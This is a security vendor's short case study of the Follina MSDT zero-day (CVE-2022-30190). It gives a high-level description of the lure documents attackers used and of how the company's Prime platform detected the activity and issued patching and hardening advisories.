The MSDT “Follina” zero‑day (CVE‑2022‑30190) emerged as a high‑severity exploitation vector in which attackers weaponised Microsoft Office documents to execute code via the Microsoft Support Diagnostic Tool. The vulnerability enabled remote code execution without macros, triggering when a user opened—or even previewed—a malicious file.
Threat campaigns leveraged invoice‑themed lures, tender documents, HR files, and government‑style templates to compromise government agencies, enterprises, and high‑value targets. Once activated, the exploit delivered C2 beacons, credential‑harvesting payloads, and loaders that established persistent footholds within corporate environments.
Athenian Tech’s Role
Athenian Tech’s Prime intelligence platform played a central role in detecting and containing live exploitation attempts. The platform did the following:
- Identified concentrated clusters of malicious Office documents and exploit‑linked URLs across email, web, and endpoint telemetry.
- Correlated hashes, domains, URLs, and C2 infrastructure with Dark Web exploit‑kit sellers and underground operator chatter.
- Issued rapid‑response advisories recommending MSDT handler disablement, EDR detections, IOC blocks, and emergency patching across client environments.
Impact
Athenian Tech’s intervention led to:
- Disrupted active Follina attack chains before lateral movement or credential compromise could escalate.
- Significantly reduced MTTD and MTTR for affected organisations during the zero‑day window.
- Assisted enterprises in updating hardening baselines and response playbooks to address future Office handler–based zero‑day vulnerabilities.
